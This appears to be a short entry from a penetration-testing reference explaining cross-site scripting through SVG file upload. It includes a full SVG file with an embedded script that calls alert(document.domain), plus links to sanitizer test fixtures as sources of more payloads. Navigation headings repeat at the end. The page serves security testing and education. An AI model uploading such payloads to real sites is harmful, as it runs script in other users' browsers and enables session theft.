XSS via SVG file upload

SVG files can contain embedded JavaScript code that executes when the image is rendered in a browser.

Example

Download as file: svg-document-domain-xss-34-.svg

SVG with inline script tag

xml

<?xml version="1.0" encoding="UTF-8"?>
<svg xmlns="http://www.w3.org/2000/svg" width="400" height="400" viewBox="0 0 124 124" fill="none">
   <rect width="124" height="124" rx="24" fill="#000000"/>
   <script type="text/javascript">
      alert(document.domain)
   </script>
</svg>

More examples

Find more inspirations in SVG sanitizing libraries' test cases, like:

https://github.com/Borewit/svg-sanitizer/tree/master/src/test/resources
https://raw.githubusercontent.com/darylldoyle/svg-sanitizer/refs/heads/master/tests/data/maliciousJsAndPhpTest.svg
https://github.com/cure53/DOMPurify/blob/main/test/fixtures/expect.mjs

Network enumeration

Kerberos delegation

Basic knowledge

Misconfigurations

XSS via SVG file upload

Example

SVG with inline script tag

More examples

XSS via SVG file upload ​

Example ​

SVG with inline script tag ​

More examples ​

XSS via SVG file upload

Example

SVG with inline script tag

More examples